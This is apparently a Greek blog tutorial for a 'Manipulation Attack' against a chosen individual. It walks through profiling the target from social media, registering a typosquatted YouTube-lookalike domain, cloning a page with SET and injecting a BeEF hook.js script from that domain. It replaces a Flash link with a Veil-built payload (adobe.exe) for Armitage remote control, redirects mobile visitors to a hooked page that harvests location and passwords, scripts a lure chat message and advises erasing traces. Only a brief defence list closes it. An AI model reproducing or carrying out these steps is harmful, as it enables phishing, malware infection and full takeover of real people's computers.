1.Kali Linux
2.Λογαριασμο στο youtube
3.Firebug
Το σημαντικοτερο σε αυτη την επιθεση ειναι οι πληροφοριες που εχουμε για το θυμα μας και στο ποσο καλοι ειμαστε στην χειραγωγιση
Για να μαζεψουμε πληροφοριες κανουμε αναζητηση στο διαδικτυο ,κοιταμε προφιλ κοινωνικων δικτυων κτλ
Οταν εχουμε μαζεψει πληροφοριες σκεφτομαστε τον δολο και πως θα χειραγωγισουμε το θυμα
Οταν το σκεφτουμε.....ερχομαστε στην επιθεση
Παταμε εδω
φτιαχνουμε εναν λογαριασμο και επιλεγουμε Δωρεαν
επειδη η επιθεση θα βασιστει στο youtube θελουμε να δουμε τι διαθεσιμο υπαρχει απο ολα αυτα τα subdomains που μας δινει το hostinger
Για να το δουμε αυτο θα χρησιμoποιησουμε το urlcrazy για να βρουμε αν υπαρχει κατι διαθεσιμο πχ στο subdomain wc.lt
*μπορειτε να παρακαμψετε αυτο το βημα και να βαλετε οτι θελετε
οποτε γραφουμε σε ενα τερματικο
urlcrazy youtube.wc.lt
το urcrazy θα κανει αναγραματισμους και μετα θα βρει αν υπαρχουν αυτα τα domain
αν βρειτε καποιο το οποιο δεν υπαρχει τοτε καταχωρηστε το
παταμε ctr+shift+f και κανουμε αναζητηση να μας βρει την καταληξη wc.lt
και βλεπουμε ποιο ειναι διαθεσιμο
πχ εγω βρηκα το youtbe.wc.lt
οποτε το κατοχυρωνω και μετα παταω διαχειριση
κατω κατω στις επιλογες Προχωρημενο επιλεγουμε Μετατροπεας DNS ζωνης
curl ifconfig.me
σημειωνουμε την εξωτερικη μας ip
πηγαινουμε αλλαζουμε το A record με την εξωτερικη μας ip και αποθηκευουμε
προωθουμε την θυρα 80 ,9999 και 3000 στο router μας
*Αν δεν ξερετε πως τοτε παταμε εδω επιλεγουμε το μοντελο του router μας και ακολουθουμε τις οδηγιες
τωρα πηγαινουμε στο youtube ,κανουμε εγγραφη η συνδεση και επιλεγουμε μεταφορτωση
επιλεγουμε προβολη διαφανειων φωτογραφιων
επιλεγουμε να ανεβασουμε φωτογραφιες απο τον υπολογιστη μας
κατεβαζουμε απο το προφιλ του θυματος φωτογραφιες και τις ανεβαζουμε
πχ ας υποθεσουμε οτι το θυμα μου ειναι η Adeanna Cooke μια απο τις ποιο ομορφες hacker στον κοσμο
οποτε κατεβαζω απο το προφιλ της και ανεβαζουμε τις φωτογραφιες στο youtube αν θελετε μπορειτε να τις επεξεργαστειτε
πχ
οπως και να εχει αυτο το κομματι πως θα φτιαξετε το βιντεο και τι φωτογραφιες θα ανεβασετε βασιζετε σε εσας
οποτε συνεχιζουμε στο ανεβασμα φωτογραφιων
θα μας εμφανισει οτι το βιντεο μας εχει δημοσιευθει στον ταδε συνδεσμο ,εμεις κανουμε αντιγραφη αυτου του συνδεσμου
ανοιγουμε ενα τερματικο και γραφουμε setoolkit
επιλεγουμε 1,2,3,2
εκει που λεει IP address for the POST back in Harvester/Tabnabbing:
δεν βαζουμε τιποτα και ποιο κατω τον συνδεσμο που μολις αντιγραψαμε
μετα επιλεγουμε y για να ξεκινησει το apache
οπως ειδατε τα γραμματα δεν μπορουν να διαβαστουν για να το διορθωσουμε αυτο γραφουμε στο τερματικο
leafpad /var/www/index.html
και προσθετουμε μετα το <head>
<meta charset=UTF-8>
αν γραψουμε παλι στην url 127.0.0.1 θα δουμε οτι μας τα εμφανιζει κανονικα
τωρα εφοσον εχουμε φτιαξει τον δολο μας μενει να φτιαξουμε και την επιθεση
γραφουμε στο τερματικο
leafpad /var/www/index.html
προσθετουμε αυτη την γραμμη
<script type=text/javascript src=http://youtbe.wc.lt:3000/hook.js></script>
και αποθηκευουμε
οπου youtbe.wc.lt βαζετε το domain που εχετε φτιαξει εσεις
τωρα χρειαζομαστε το firebug
παταμε εδω ωστε να κανουμε εγκατασταση του firebug
επιλεγουμε add to firefox
επιλεγουμε install
και οταν γινει εγκατασταση τοτε θα δουμε ενα σκαθαρι πανω δεξια
το firebug σας επιτρεπει να βλεπετε και να αλλαζετε τον κωδικα της σελιδας εμεις θα το χρησιμοποιησουμε ωστε να φτιαξουμε την σελιδα
οποτε γραφουμε στην url και 127.0.0.1
με δεξι κλικ στο πλαισιο επιλεγουμε Inspect Element with Firebug
επιλεγουμε οπως στην κατω εικονα και με το πληκτρο delete διαγραφουμε
τωρα εφοσον εφυγε το πλαισιο που ελεγε για την επιλογη γλωσσας τοτε επιλεγουμε πανω πανω που λεει html class και με δεξι κλικ επιλεγουμε copy html
γραφουμε σε ενα τερματικο
leafpad /var/www/adobe.html
και κανουμε επικολληση του κωδικα html που αντιγραψαμε
τωρα γραφουμε στην url 127.0.0.1/adobe.html
και βλεπουμε
leafpad /var/www/adobe.html
παταμε ctrl+H και στην πανω γραμμη Find what γραφουμε
http:\/\/get.adobe.com\/flashplayer\/\
στην κατω γραμμη Replace with γραφουμε http://youtbe.wc.lt/adobe.exe
τωρα μας μενει να βγαλουμε τον ιο οποτε θα χρειαστουμε το Veil
*αν δεν το εχετε εγκατεστημενο τοτε κοιταξτε σε παλιοτερους οδηγους*
γραφουμε σε ενα τερματικο
cd /Veil/Veil-Evasion
και ./Veil-Evasion
επιλεγουμε οτι payload θελουμε βαζουμε την εξωτερικη μας ip (η domain), και θυρα
και το ονομα adobe
με την εντολη
mv /veil-output/compiled/adobe.exe /var/www/
οποτε τωρα ειμαστε ετοιμοι
γραφουμε στην url το domain μας και βλεπουμε αν μας εμφανιζετε
πχ
αν δεν σας εχει εμφανιστει τοτε δεν εχετε προωθησει την θυρα 80 η δεν εχει μεταφερθει ακομα το A record
για να δειτε αν εχει μεταφερθει το A record γραψτε στο τερματικο
ping youtbe.wc.lt -c 2
αν δουμε την εξωτερικη μας ip τοτε ειμαστε ενταξει οποτε πρεπει να κοιταξουμε τις ρυθμισεις στο router μας
Τωρα ξεκιναμε το BeEF και το Armitage *(κοιταξτε σε παλιοτερους οδηγους πως)
Στο Armitage ξεκιναμε να ακουει στην θυρα 9999
Ξεκιναμε το BeEF (για νεοτερη εκδοση του BeEF κοιταξτε εδω)
Τελικο βημα μας μενει να στειλουμε στο θυμα μας την σελιδα που φτιαξαμε δλδ το http://youtbe.wc.lt
για να το κανουμε ποιο πηστικο γραφουμε
http://youtbe.wc.lt/?www.youtube.com/watch=fad33vwe
η
http://youtbe.wc.lt/?watch=njxdfw32
οτι βαλουμε μετα το /? δεν το πιανει οποτε γραφετε οτι θελετε εσεις
πριν το στειλουμε πηγαινουμε εδω για να κανουμε debug του συνδεσμου
και κατω κατω βλεπουμε πως θα εμφανιστει στο facebook
οποτε τωρα στελνουμε τον συνδεσμο στο θυμα μας μεσω συνομιλιας
πχ μεθοδος κινεζου "ρε συ εσυ δεν εισαι αυτη?"
οταν το θυμα πατησει τον συνδεσμο θα παει στην σελιδα μας και θα τον δουμε στο BeEF σαν zombie
επιλεγουμε πανω στο θυμα ,commands ,γραφουμε στο search redirect
επιλεγουμε Redirect Browser η Riderect Browser (iframe) και γραφουμε στο Redirect url http://youtbe.wc.lt/adobe ωστε να τον παει στην σελιδα για να κανει ληψη του ιου
στο θυμα θα εμφανιστει αυτο
οταν το θυμα κατεβασει και τρεξει τον ιο τοτε θα τον δουμε σαν slave στο Armitage
τωρα εχουμε τον πληρη ελενχο του υπολογιστη του
(δειτε σε παλιοτερους οδηγους πως θα κανετα persist)
Τι γινεται ομως αν το θυμα ειναι απο κινητο η tablet?
πολυ απλα θα ρυθμισουμε τον apache server μας να ανακατευθυνει
γραφουμε σε ενα τερματικο
a2enmod rewrite
service apache2 restart
μετα cd /etc/apache2/sites-enabled
ls
μετα nano 000-default και αλλαζουμε τo None σε All
και με την εντολη service apache2 restart κανουμε παλι επανεκκινηση του apache
γραφουμε
leafpad /var/www/.htaccess
και βαζουμε μεσα στο αρχειο
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} "android|blackberry|googlebot-mobile|iemobile|ipad|iphone|ipod|opera mobile|palmos|webos" [NC]
RewriteRule ^$ http://youtbe.wc.lt/error [L,R=302]
</IfModule>
οπου http://youtbe.wc.lt/ βαζετε το domain που φτιαξατε
τωρα μας μενει να φτιαξουμε το αρχειο error.html
γραφουμε leafpad /var/www/error.html
και βαζουμε μεσα
<head>
<span style="font-size: 35px;"><b>Λόγω αναβάθμισης η συσκευή σας δεν υποστηρίζετε προσωρινά</b></span><br />
<span style="font-size: 35px;"><b>Παρακαλώ συνδεθείτε απο ένα σταθερό υπολογιστή</b></span></div>
<script type=text/javascript src=http://youtbe.wc.lt:3000/hook.js></script>
</head>
*μπορειτε να παρετε πληροφοριες απο το κιν του θυματος οπως ip ,τοποθεσια,κωδικους κτλ *κοιταξτε παλιοτερο οδηγο με BeEF*
αποθηκευουμε και για αλλη μια φορα κανουμε επανεκκινηση του apache
service apache2 restart
οταν το θυμα πατησει στον συνδεσμο απο κινητο τοτε θα ανακατευθυνθει εδω
Με αυτο τον τροπο το θυμα θα παει κατευθειαν στην σελιδα error με αποτελεσμα να μην δει το βιντεο και να αναγκαστει να μπει απο τον υπολογιστη του
*Σημαντικο ειναι να γνωριζετε οτι μια επιθεση δεν πρεπει να την εφαρμοζετε πανω απο 1 φορα ,αν αποτυχει η επιθεση δοκιμαστε με αλλο τροπο ,δολο κτλ
* Μπορειτε να κανετε παρα πολλες παραλλαγες αυτης της επιθεσης
εγω σας εδειξα απλα μια μεθοδο γιαυτο την ονομασα Manipulation Attack
δλδ αυτη η επιθεση βασιζετε στην ικανοτητα να χειραγωγισετε το θυμα
*οταν εχετε παρει προσβαση στον υπολογιστη του θυματος καλο θα ητανε να σβησετε το βιντεο
Πως θα προστατευτειτε;
1.Παντα να κοιτατε τους συνδεσμους
2.Ποτε μην κατεβαζετε αρχεια απο αγνωστες σελιδες
3.Μην στηριζεστε στο antivirus που εχετε
4.Περιοριστε τα προσωπικα σας δεδομενα στο διαδικτυο
5.Περιοριστε τους φιλους σας στα κοινωνικα δικτυα
Δεν υπάρχουν σχόλια:
Δημοσίευση σχολίου